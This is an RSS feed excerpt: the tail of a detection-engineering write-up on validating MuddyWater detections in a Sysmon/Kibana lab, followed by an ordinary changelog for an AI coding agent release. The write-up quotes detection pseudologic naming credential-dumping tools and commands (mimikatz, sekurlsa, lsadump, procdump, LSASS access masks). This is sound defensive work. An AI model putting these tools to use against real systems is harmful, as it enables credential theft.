Sysmon captures network connections at the Windows kernel level. With NAT, the connection from the VM’s perspective terminates at the NAT gateway (10.0.2.2), not at api.telegram.org. Sysmon sees a connection to 10.0.2.2:443, not api.telegram.org:443. The detection rule looking for api.telegram.org as the destination found nothing.</p><p>There was an additional layer: VirtualBox NAT does not forward arbitrary outbound HTTPS traffic by default in this lab configuration — the VM had no direct internet path, only access to the host’s 10.0.2.2 gateway. Even fixing the Sysmon observation problem would require a working internet path from the VM.</p><p><strong>Result: FAIL</strong> — coverage score 3 instead of 5.</p><p><strong>What it would take to fix:</strong> Add a host-only or bridged network adapter to the VM that provides direct internet access, and confirm Sysmon captures the connection with the external destination. Alternatively, run a local HTTPS server on the host at api.telegram.org via a hosts file override, which would make the destination resolvable within the lab and catchable by Sysmon.</p><p><strong>The lesson:</strong> VirtualBox NAT is the right choice for lab isolation (the VM cannot reach the internet accidentally), but it is the wrong choice if you need to validate detections based on external destination hostnames. Design the network topology before writing detection validation cases.</p><h4>Scar 4: Kibana Showed Nothing — Wrong Time Window</h4><p>After running the SecurityCenter2 WMI discovery simulation (Step 30), the Kibana query returned zero results.</p><p>The query was correct. The simulation had run correctly. The events were in Elasticsearch.</p><p>Root cause: Kibana’s default time window was set to “Last 15 minutes.” The simulation had run in a previous lab session, and Winlogbeat had shipped the events to Elasticsearch during that session. The events existed — they were just outside the current time window.</p><p><strong>What was fixed:</strong> Changed the time filter to “Last 24 hours.” Events appeared immediately.</p><p><strong>The lesson:</strong> When a Kibana proof shows no results, the first diagnostic step is the time filter, not the query. This is obvious in retrospect and a consistent source of false “detection failed” conclusions during initial validation runs.</p><h4>Scar 5: Detection Design Bugs Found in Review (Before Validation)</h4><p>Before running any simulations, every detection record went through a structured review pass. Four real bugs were found:</p><p><strong>det_mw_0010 Rule B — Operator precedence error.</strong> The original pseudologic was:</p><pre>event_type = process_create AND<br>image IMATCHES "mimikatz\.exe" OR<br>image ENDSWITH "procdump64.exe" OR<br>command_line IMATCHES "(sekurlsa|lsadump|privilege::debug)"</pre><p>Without explicit parentheses, OR has lower precedence than AND in most query languages. The command_line IMATCHES clause was evaluated independently of the event_type guard, meaning the rule would fire on any event (not just process_create) where the command line contained sekurlsa. In a SIEM with millions of events per day, this generates noise and potentially masks the real signal. The fix added explicit brackets to keep all OR branches inside the event_type = process_create guard.</p><p><strong>det_mw_0009 Rule C — T1033 was not covered.</strong> The initial Rule C matched SecurityCenter2, Win32_NetworkAdapterConfiguration, and Win32_OperatingSystem — covering T1518.001, T1016, and T1082. The documented CISA script also collects the username via Win32_ComputerSystem. T1033 (System Owner/User Discovery) was missing. Fixed by adding Win32_ComputerSystem|Win32_UserAccount|UserName to the pattern match.</p><p><strong>det_mw_0004 Rule A — Missing x86 Google path.</strong> The initial allowlist only contained the x64 path C:\Program Files\Google\. On 64-bit Windows, the 32-bit Google Update installs to C:\Program Files (x86)\Google\. Without the x86 path in the allowlist, any Goopdate.dll load from the legitimate 32-bit Google installation would fire the detection. Added both paths.</p><p><strong>det_mw_0010 Rule A — Access mask set too narrow.</strong> The initial mask set covered standard Mimikatz masks (0x1010, 0x1410, 0x1438) but missed 0x1fffff (PROCESS_ALL_ACCESS, used by custom C++ dumpers and some loaders) and 0x1f0fff (another all-access variant observed in field reporting). A detection that only catches stock Mimikatz masks is bypassed by any custom implementation. Extended the mask set to cover known custom-dumper variants.</p><p><strong>The lesson:</strong> Writing pseudologic in a YAML field with no syntax validation means operator precedence bugs survive until someone reads the logic carefully. Structured peer review — ideally by someone who will try to break the rule — catches these before they hit production.</p><h4>Scar 6: The OpenCTI Stack Was in a Different Repository</h4><p>The original project structure had the OpenCTI Docker Compose stack in a separate repository (opencti-intelligent-shield) that was not included in the desert-hydra repo. The start.sh script referenced the external repo with a hardcoded path. Cloning operation-desert-hydra and running start.sh failed immediately on any machine other than the development machine.</p><p><strong>What was fixed:</strong> The entire stack — docker-compose.yml, docker-compose.kibana.yml, and .env.template — was copied into stack/ inside the desert-hydra repo. All path references were updated. The repo is now fully self-contained: git clone + cp .env.template .env + bash start.sh works from a clean machine with no external dependencies beyond Docker, Vagrant, VirtualBox, Ansible, and pywinrm.</p><p><strong>The lesson:</strong> A reproducibility claim requires everything needed to reproduce to be in the same repository. External path dependencies are invisible during development and obvious on first external clone.</p><h4>Scar 7: MITRE Connector Timing</h4><p>The import script (tools/opencti_import.py) creates MuddyWater → uses → ATT&amp;CK technique relationships by looking up techniques that the MITRE ATT&amp;CK connector has synced into OpenCTI. The connector takes several minutes to complete its initial sync of 846 techniques.</p><p>If the import script runs before the connector finishes, the technique lookup returns nothing — the techniques don’t exist yet. The original script failed silently on these lookups and skipped the relationship creation.</p><p><strong>What was fixed:</strong> The script was updated with find_or_create_attack_pattern(): if a technique is not yet in OpenCTI, create a stub AttackPattern object with the correct x_mitre_id. When the MITRE connector eventually syncs that technique, OpenCTI's deduplication logic merges the stub with the connector's fully populated object. All relationships that were created against the stub are preserved and now point to the enriched object. Running the script a second time after the connector finishes confirms existing objects rather than creating duplicates.</p><p><strong>The lesson:</strong> Any script that creates relationships against objects populated by a connector needs to handle the case where the connector has not finished. Fail loudly or create stubs — don’t skip silently.</p><h4>Surviving Gaps</h4><p>Two failures from Phase 5 remain open:</p><p><strong>det_mw_0004</strong> — DLL side-loading detection (EID 7) is not lab-validated. The detection rule is sound; the simulation needs a valid PE DLL. Coverage score stays at 3 until the lab is extended with a compiled test DLL.</p><p><strong>det_mw_0008a</strong> — Telegram Bot API connection detection (EID 3) is not lab-validated. The detection rule is sound; the lab network topology prevents capturing external destination hostnames via NAT. Coverage score stays at 3 until the VM has a direct internet path or a local HTTPS proxy target.</p><p>These are documented as open items, not dismissed as “out of scope.” The coverage score scale is designed to reflect this: a score of 3 means “behavioral detection, no lab proof” — it is honest about the gap rather than claiming coverage that was not validated.</p><p><strong>Seven ATT&amp;CK techniques have zero detection coverage.</strong> Lateral movement (T1021.001 RDP, T1550.002 Pass the Hash), Collection (T1005, T1039), Exfiltration (T1041), and Impact (T1486 ransomware, T1490 shadow copy deletion from DarkBit). These are acknowledged in the coverage matrix, not hidden. The actor uses them. The public source base documents them. The detection coverage does not exist in this iteration.</p><p><em>All code, data, and proof screenshots are version-controlled at </em><a href="https://github.com/anpa1200/operation-desert-hydra"><em>github.com/anpa1200/operation-desert-hydra</em></a></p><h3>Follow My Work</h3><p>I publish practical cybersecurity research, CTI workflows, detection engineering notes, malware analysis projects, OpenCTI work, cloud and Kubernetes security research, AI-assisted security tooling, labs, and technical guides.</p><ul><li><strong>Portfolio / Knowledge Base:</strong> <a href="https://anpa1200.github.io/">https://anpa1200.github.io/</a></li><li><strong>Medium:</strong> <a href="https://medium.com/@1200km">https://medium.com/@1200km</a></li><li><strong>GitHub:</strong> <a href="https://github.com/anpa1200">https://github.com/anpa1200</a></li><li><strong>LinkedIn:</strong> <a href="https://www.linkedin.com/in/andrey-pautov/">https://www.linkedin.com/in/andrey-pautov/</a></li></ul><h4><strong>Andrey Pautov</strong></h4><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=34da7917acf0" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/operation-desert-hydra-ai-assisted-cti-pipeline-muddywater-to-kibana-34da7917acf0">Operation Desert Hydra — AI-Assisted CTI Pipeline: MuddyWater to Kibana</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.9.1]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Added

Added regional Xiaomi Token Plan login/provider entries (xiaomi-token-plan-sgp, xiaomi-token-plan-ams, xiaomi-token-plan-cn) so omp login can store token-plan keys against the selected region. (#1846)

Fixed

Removed the context-1m-2025-08-07 (1M long-context) beta from the...]]></description>
<link>https://tsecurity.de/de/3580238/tools/v1591/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3580238/tools/v1591/</guid>
<pubDate>Mon, 08 Jun 2026 02:51:01 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Added regional Xiaomi Token Plan login/provider entries (<code>xiaomi-token-plan-sgp</code>, <code>xiaomi-token-plan-ams</code>, <code>xiaomi-token-plan-cn</code>) so <code>omp login</code> can store token-plan keys against the selected region. (<a href="https://github.com/can1357/oh-my-pi/issues/1846" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1846/hovercard">#1846</a>)</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Removed the <code>context-1m-2025-08-07</code> (1M long-context) beta from the Anthropic agent request headers, the OAuth model-discovery header, and the Claude usage-API header. Sending it caused subscription/OAuth requests without long-context credits to fail with <code>429 Usage credits are required for long context requests</code>, breaking Sonnet. The remaining betas are unchanged.</li>
<li>Fixed Kimi K2.x <code>maxTokens</code> on Fireworks and Fire Pass (<code>fireworks/kimi-k2.5</code>, <code>fireworks/kimi-k2.6</code>, <code>firepass/kimi-k2.6-turbo</code>) being inherited from Fireworks <code>/v1/models</code> discovery (<code>max_completion_tokens: 65536</code>) rather than the published Kimi-on-Fireworks output budget, which let callers (and the openai-completions default-injection safety net) ship a budget the router cannot honor and made runaway reasoning traces more likely. The Fireworks resolver now clamps every Kimi K2.x id (public catalog ids and the canonical <code>accounts/fireworks/{models,routers}/kimi-k2…</code> wire form) to 32,768 output tokens, and the generator applies the same cap as a post-processing safety net so the <code>firepass</code> static fallback and the bundled <code>fireworks</code> entries stay in sync across regens. (<a href="https://github.com/can1357/oh-my-pi/issues/1849" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1849/hovercard">#1849</a>)</li>
<li>Fixed Xiaomi Token Plan MiMo OpenAI-compatible tool-call continuations omitting required <code>reasoning_content</code> replay. (<a href="https://github.com/can1357/oh-my-pi/issues/1846" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1846/hovercard">#1846</a>)</li>
<li>Fixed Anthropic prompt caching for OpenAI-compatible Claude proxies by honoring <code>compat.cacheControlFormat: "anthropic"</code> outside OpenRouter. (<a href="https://github.com/can1357/oh-my-pi/issues/1845" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1845/hovercard">#1845</a>)</li>
<li>Fixed Moonshot Kimi K2.6 silently pausing for many seconds between tool calls because the server discarded the <code>reasoning_content</code> that omp was already sending with every assistant tool-call replay. The K2.6 <code>thinking</code> parameter takes an extra <code>keep</code> field whose default (<code>null</code>) ignores historical reasoning, so K2.6 had to re-derive its full chain-of-thought from the user prompt on every iteration of the agent loop. The Moonshot direct (<code>api.moonshot.ai</code>) and Kimi Code (<code>api.kimi.com</code>) wire bodies now send <code>thinking: { type: "enabled", keep: "all" }</code> for <code>kimi-k2.6</code> requests with reasoning enabled, matching Moonshot's documented best practice for multi-step tool-calling agents. The flag is gated on the K2.6 id and the two native hosts because earlier Moonshot models (K2.5 and below) 400 on the unknown field and every Kimi gateway (OpenRouter, OpenCode, Kilo, Fireworks, …) speaks its own thinking shape. (<a href="https://github.com/can1357/oh-my-pi/issues/1838" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1838/hovercard">#1838</a>)</li>
<li>Fixed Alibaba DashScope (Bailian) compatible-mode endpoint <code>400 InternalError.Algo.InvalidParameter: The provided messages input is invalid. The error info is [Unexpected item type in content.]</code> when a screenshot or other image-producing tool result was folded into a known text-only Qwen turn (e.g. <code>qwen3.7-max</code>, <code>qwen-max</code>, <code>qwen3-coder-*</code>) hosted at <code>dashscope.aliyuncs.com/compatible-mode/v1</code>. <code>convertMessages</code> in <code>openai-completions</code> no longer forwards <code>image_url</code> content parts for those text-only id families even when a misconfigured custom provider claims <code>input: ["text", "image"]</code>; multimodal compatible-mode ids such as <code>qwen3.7-plus</code> and <code>qwen-vl-max</code> still rely on the catalog <code>input</code> field. The tool-result branch and the user-content branch both fall back to the standard <code>[image omitted: model does not support vision]</code> placeholder for text-only ids so the model still sees the attachment intent. (<a href="https://github.com/can1357/oh-my-pi/issues/1859" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1859/hovercard">#1859</a>)</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Added deferred session-title generation so greetings no longer become the session title. A first user message that is only a greeting / acknowledgement / filler ("hi", "thanks", "ok", a bare number, emoji-only, etc.) is now detected deterministically and skips titling entirely — no title model is invoked. Title generation then retries on each subsequent user message while the session stays unnamed, so the title is deduced from the first message that actually describes work. A capable online title model may additionally answer <code>none</code> to decline a non-greeting taskless message (normalized to "no title").</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed mid-turn user steers to reach the model inside a wire-only interjection envelope, while transcripts and persisted session history keep the user's original text.</li>
<li>Changed the system prompt to treat user requests for parallel work as <code>task</code> subagent fan-out rather than parallel tool calls.</li>
<li>Changed the Agent Control Center's new-agent description field to use the multiline TUI editor, with Enter inserting lines and Ctrl+Enter generating the spec.</li>
<li>Changed the Agent Control Center and Extension Control Center to accept Left/Right arrow keys for switching tabs (source / provider), in addition to Tab / Shift+Tab — matching the model and settings selectors, whose <code>TabBar</code> already supported arrow navigation.</li>
<li>Refreshed the Ctrl+R history search overlay: the selected row now renders as a full-width <code>selectedBg</code> highlight bar, matched query tokens are highlighted in the accent color, each result shows a right-aligned relative timestamp, and the panel gained an icon'd accent title plus a two-tone keyhint footer. The selector also gained PageUp/PageDown (via the configurable <code>tui.select.pageUp</code>/<code>pageDown</code> keybindings) and Home/End navigation.</li>
<li>Changed Perplexity API-key web search to return more comprehensive results: <code>web_search_options.search_context_size</code> is now <code>high</code> (was <code>medium</code>) for maximum retrieval grounding, the default <code>num_search_results</code> is <code>20</code> (was <code>10</code>) so twice as many sources are surfaced, and <code>return_related_questions</code> is enabled with the response's <code>related_questions</code> now parsed into <code>relatedQuestions</code> (previously dropped). On an identical query this lifted the result from 10 sources / ~410 output tokens to 20 sources / ~1900 output tokens with a structured, multi-section answer; latency tracks model output length, not context size, so the 60s hard timeout headroom is unchanged.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>
<p>Fixed a streamed assistant message freezing at a partial prefix (e.g. only "Nat" of "Natives built, now…") on ED3-risk terminals (Ghostty/kitty/iTerm2/Alacritty), with the final text appearing only after a resize. <code>TranscriptContainer</code> freezes each non-live block by replaying its last live render, but render coalescing can finalize a block's content and append the next block within the same throttled frame — so the block was sealed at its stale mid-stream snapshot and never repainted until the next <code>thaw</code>. The block that was live on the previous render is now recomputed once on the live→frozen transition, sealing it at its final content.</p>
</li>
<li>
<p>Fixed ACP/RPC stdio startup so protocol frames are no longer consumed as one-shot piped prompt input before the JSON-RPC transport starts.</p>
</li>
<li>
<p>Fixed <code>omp completions</code> to await the completion script write before exiting.</p>
</li>
<li>
<p>Fixed <code>AssistantMessageComponent</code> exposing its stable-prefix completion API again so streamed assistant messages remain unstable until explicitly completed.</p>
</li>
<li>
<p>Fixed session restoration to ignore transient fallback model switches (such as automatic context-promotion or retry fallback) so resumed or resumed-switch sessions revert to the configured default model unless the last change was a user-selected temporary model</p>
</li>
<li>
<p>Fixed in-session <code>/resume</code> to restore both the last user-selected temporary model and persisted plan/goal mode state instead of falling back to the default model with plan mode off.</p>
</li>
<li>
<p>Fixed the <code>/resume</code> session picker overflowing short viewports: the visible window was hardcoded to 5 entries (and assumed 3 lines each), but titled sessions render 4 lines, so on a typical-height terminal the picker's header and search box scrolled off the top and the first entry was hidden until you scrolled the terminal up. The visible-entry count is now derived from the live terminal height (budgeting the worst-case 4-line titled entry plus the picker's chrome), so the whole picker fits the viewport and grows on taller terminals.</p>
</li>
<li>
<p>Fixed the Agent Control Center and Extension Control Center dashboards overflowing the terminal: they were mounted inline below the chat transcript, so the combined height exceeded the viewport — the tab bar and controls scrolled off the top into native scrollback, and every state change yanked the view back to the bottom. Both dashboards now render as full-screen overlays sized to the live terminal height (<code>process.stdout.rows</code>), re-fit on resize, fill the viewport, and reserve space for the footer keyhints so the controls stay visible.</p>
</li>
<li>
<p>Fixed Ctrl+R history search results to remain globally sorted by prompt recency after merging FTS prefix matches with substring fallback matches.</p>
</li>
<li>
<p>Fixed Exa web search with no stored or environment credential to use the public Exa MCP fallback again, preserving the auth storage → <code>EXA_API_KEY</code> → <code>mcp.exa.ai</code> resolution order (<a href="https://github.com/can1357/oh-my-pi/issues/1860" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1860/hovercard">#1860</a>).</p>
</li>
<li>
<p>Fixed ACP plan-mode writes to <code>local://PLAN.md</code> so session-local plan artifacts are written to OMP's local artifact root instead of being routed through the editor <code>writeTextFile</code> bridge, avoiding Zen's <code>Internal error</code> and making the plan readable after creation (<a href="https://github.com/can1357/oh-my-pi/issues/1863" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1863/hovercard">#1863</a>).</p>
</li>
<li>
<p>Fixed ACP plan mode stranding the agent at plan approval: entering <code>mode: "plan"</code> now registers a standing <code>resolve</code> handler so the agent's <code>resolve { action: "apply" }</code> no longer fails with <code>No pending action to resolve. Nothing to apply or discard.</code> The handler validates the plan file, asks the ACP client to confirm via <code>unstable_createElicitation</code> when the client supports forms, renames the approved plan to <code>local://&lt;title&gt;.md</code>, and exits plan mode so the agent regains write tools for execution (<a href="https://github.com/can1357/oh-my-pi/issues/1869" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1869/hovercard">#1869</a>).</p>
</li>
<li>
<p>Fixed <code>provider.appendOnlyContext: "auto"</code> staying inactive for Xiaomi Token Plan/SGLang endpoints, preserving prefix-cache hits without forcing append-only mode globally (<a href="https://github.com/can1357/oh-my-pi/issues/1851" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1851/hovercard">#1851</a>).</p>
</li>
<li>
<p>Fixed <code>models.yml</code> compatibility parsing to preserve <code>compat.cacheControlFormat: "anthropic"</code> for custom OpenAI-compatible Claude proxies. (<a href="https://github.com/can1357/oh-my-pi/issues/1845" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1845/hovercard">#1845</a>)</p>
</li>
<li>
<p>Fixed the TUI's <code>Settings → Plugins</code> panel reporting "No plugins installed" when only marketplace plugins were installed. The panel now merges <code>PluginManager.list()</code> with <code>MarketplaceManager.listInstalledPlugins()</code> — the same data source the <code>/plugins list</code> slash command and <code>omp plugin list</code> CLI already used — and tags each row with an <code>[npm]</code> / <code>[marketplace]</code> kind badge, a scope tag, and a shadow indicator for project-shadowed user installs. Selecting a marketplace row opens a new <code>MarketplacePluginDetailComponent</code> whose single <code>Enabled</code> toggle calls <code>MarketplaceManager.setPluginEnabled(pluginId, enabled, scope)</code>, with read-only metadata (version, install path, installed-at, last-updated, git commit SHA) listed below the toggle. The empty-state now lists both install commands (<code>omp plugin install &lt;package&gt;</code> and <code>omp plugin install &lt;name&gt;@&lt;marketplace&gt;</code>) (<a href="https://github.com/can1357/oh-my-pi/issues/1842" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1842/hovercard">#1842</a>).</p>
</li>
<li>
<p>Fixed scoped mnemopi recall in <code>MnemopiSessionState.collectScopedRecallResults</code>/<code>recallResultsScoped</code> to await the async <code>Mnemopi.recallEnhanced</code> so the new auto-derived <code>queryEmbedding</code> flows through. Without this, the embedding-enabled mnemopi backend silently kept running FTS-only on every recall. (<a href="https://github.com/can1357/oh-my-pi/issues/1832" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1832/hovercard">#1832</a>)</p>
</li>
<li>
<p>Fixed the SSH tool renderer inlining multiline remote commands into its single-line status header, which produced a malformed cell where the bordered output block opened mid-command. The renderer now drops the command from the header (which keeps only <code>[host]</code>) and renders the full command in a framed section above <code>Output</code>, mirroring the bash renderer. <code>renderStatusLine</code> also flattens any embedded CR/LF in <code>description</code>, <code>meta</code>, and <code>title</code> so no tool can accidentally expand the header into multiple rows (<a href="https://github.com/can1357/oh-my-pi/issues/1828" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1828/hovercard">#1828</a>).</p>
</li>
<li>
<p>Fixed <code>tsc --noEmit</code> against <code>packages/coding-agent/tsconfig.json</code> reporting 56 errors under TypeScript 5.x (<code>builtin-registry.ts</code> × 46, <code>agent-session-openai-responses-replay.test.ts</code> × 10). The repo's own gate (<code>tsgo</code> / TypeScript 6.x) already accepted the <code>() =&gt; void</code> slash-command handlers, but 5.x rejects them because it does not coerce a <code>void</code>-returning function value into a <code>() =&gt; T | undefined</code> slot. The <code>SlashCommandSpec.handle</code> / <code>handleTui</code> signatures and the test's <code>createPersistedSession</code> <code>populate</code> callback are now expressed as a union of two function types (one returning a <code>SlashCommandResult</code> / target, one returning <code>void</code>), so the existing handler bodies typecheck on both compilers (<a href="https://github.com/can1357/oh-my-pi/issues/1821" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1821/hovercard">#1821</a>).</p>
</li>
<li>
<p>Fixed <code>omp update</code> leaving <code>@oh-my-pi/pi-natives</code> and the platform-specific <code>@oh-my-pi/pi-natives-&lt;tag&gt;</code> leaf at the previous version on <code>bun install -g</code> updates, so the next launch loaded a stale <code>.node</code> file and aborted at <code>validateLoadedBindings</code> with <code>The .node file on disk is from a different release than this loader</code>. <code>omp update</code> now pins the native addon core and the platform leaf to the same version it installs for <code>@oh-my-pi/pi-coding-agent</code> (<a href="https://github.com/can1357/oh-my-pi/issues/1824" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1824/hovercard">#1824</a>).</p>
</li>
</ul>
<h2>@oh-my-pi/pi-mnemopi</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Changed <code>Mnemopi.recall()</code>, <code>Mnemopi.recallEnhanced()</code>, <code>Mnemopi.search()</code>, <code>Mnemopi.query()</code>, the module-level <code>recall</code>/<code>recallEnhanced</code>/<code>search</code>/<code>query</code> exports, the <code>BeamMemory.recall</code>/<code>recallEnhanced</code> methods, the free <code>recall</code>/<code>recallEnhanced</code> functions in <code>core/beam/recall</code>, and <code>orchestrateRecall</code> to return <code>Promise&lt;RecallResult[]&gt;</code> so the recall pipeline can auto-derive <code>queryEmbedding</code> from the query text via <code>embedQuery</code>. Callers must <code>await</code> recall calls; pass <code>queryEmbedding: null</code> to opt out of auto-embedding and stay on FTS-only.</li>
<li>Changed the MCP entrypoints <code>handleToolCall</code>, <code>callToolJson</code>, and <code>handleJsonRpc</code> in <code>mcp-server</code>/<code>mcp-tools</code> to async so the recall/shared-recall handlers can await the new <code>Promise&lt;ToolResult[]&gt;</code> shape; external MCP transports must <code>await</code> these.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed <code>memory_embeddings</code> never being populated by the production <code>remember</code>/<code>rememberBatch</code>/<code>updateWorking</code>/<code>consolidateToEpisodic</code> paths; embedding generation is now scheduled as a background task on <code>beam.pendingExtractions</code> (mirroring <code>scheduleFactExtraction</code>), so configured providers (fastembed, OpenAI-compatible API, custom) actually run and rows land in <code>memory_embeddings(memory_id, embedding_json, model)</code>. (<a href="https://github.com/can1357/oh-my-pi/issues/1832" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1832/hovercard">#1832</a>)</li>
<li>Fixed <code>recall()</code>/<code>recallEnhanced()</code> never deriving a query embedding from the query text, which silently degraded every deployment to FTS-only regardless of provider configuration. The recall pipeline now auto-calls <code>embedQuery(query)</code> when <code>options.queryEmbedding</code> is undefined; pass <code>null</code> to keep the old FTS-only behaviour. (<a href="https://github.com/can1357/oh-my-pi/issues/1832" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1832/hovercard">#1832</a>)</li>
<li>Fixed <code>toRecallOptions</code> dropping <code>queryEmbedding</code> between the <code>Mnemopi</code> facade and the beam layer, so callers can now explicitly pin or disable the query vector through the public API.</li>
<li>Fixed <code>withMemory</code> (CLI) and <code>withBeam</code>/<code>withSharedBeam</code> (MCP) closing the SQLite handle before background fact-extraction and embedding tasks finished, so short-lived <code>mnemopi store</code>/<code>mnemopi sleep</code> and MCP <code>remember</code>/<code>update</code> paths now drain <code>flushExtractions</code> before close instead of silently dropping <code>memory_embeddings</code> rows. CLI handlers and MCP <code>handleRemember</code>/<code>handleUpdate</code>/<code>handleSleep</code>/etc. are async as a result. (<a href="https://github.com/can1357/oh-my-pi/issues/1832" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1832/hovercard">#1832</a>, follow-up to <a href="https://github.com/can1357/oh-my-pi/pull/1833" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1833/hovercard">#1833</a> review)</li>
<li>Fixed the process-wide <code>embedQuery()</code> cache in <code>core/embeddings.ts</code> keying by query text alone, which let two <code>Mnemopi</code> instances in the same process with different providers/models cross-contaminate their <code>dense_score</code> rankings. The cache key now includes a WeakMap-assigned provider identity, the resolved model name, and the configured <code>apiUrl</code>, so disjoint runtimes never read each other's cached vectors. (<a href="https://github.com/can1357/oh-my-pi/issues/1832" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1832/hovercard">#1832</a>, follow-up to <a href="https://github.com/can1357/oh-my-pi/pull/1833" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1833/hovercard">#1833</a> review)</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Fixed</h3>
<ul>
<li>Fixed the OSC 11 appearance poll re-querying every 2s forever on terminals that support Mode 2031 but never change theme, whose repeated OSC 11/DA1 writes cleared the user's active text selection (breaking copy every 2 seconds). The poll now stops as soon as DECRQM confirms Mode 2031 support, since push notifications make polling redundant.</li>
</ul>
<h2>@oh-my-pi/pi-utils</h2>
<h3>Fixed</h3>
<ul>
<li>Hardened <code>getIndentation</code> against malformed paths: any filesystem error from the <code>.editorconfig</code> probe (e.g. <code>ENAMETOOLONG</code> on oversized garbage path segments) is now swallowed and cached as a miss instead of escaping and crashing the TUI mid-render (<a href="https://github.com/can1357/oh-my-pi/issues/1871" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1871/hovercard">#1871</a>).</li>
<li>Fixed <code>getIndentation</code> (and the edit renderer's <code>replaceTabs</code> callers) crashing with <code>ENAMETOOLONG</code>/<code>ENOTDIR</code>/etc. when handed a path with an overlong component or a non-directory in its parent chain. Editorconfig discovery now short-circuits to the default tab width on any path component above <code>NAME_MAX</code> (255 bytes) and absorbs any <code>FsError</code> while walking the editorconfig chain — best-effort discovery must never escape as an uncaught exception (<a href="https://github.com/can1357/oh-my-pi/issues/1872" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/1872/hovercard">#1872</a>).</li>
</ul>
<h2>What's Changed</h2>
<ul>
<li>fix(robomp): backfill partial-clone blobs before worktree add by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4586156887" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1820" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1820/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1820">#1820</a></li>
<li>fix(coding-agent): made slash-command handlers compatible with TypeScript 5.x by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4586302922" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1822" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1822/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1822">#1822</a></li>
<li>fix(coding-agent): sync pi-natives on omp update by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4586537250" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1825" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1825/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1825">#1825</a></li>
<li>fix(tools/ssh): render multiline remote commands in a framed body block by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4586853964" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/1830" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/1830/hovercard" href="https://github.com/can1357/oh-my-pi/pull/1830">#1830</a></li>
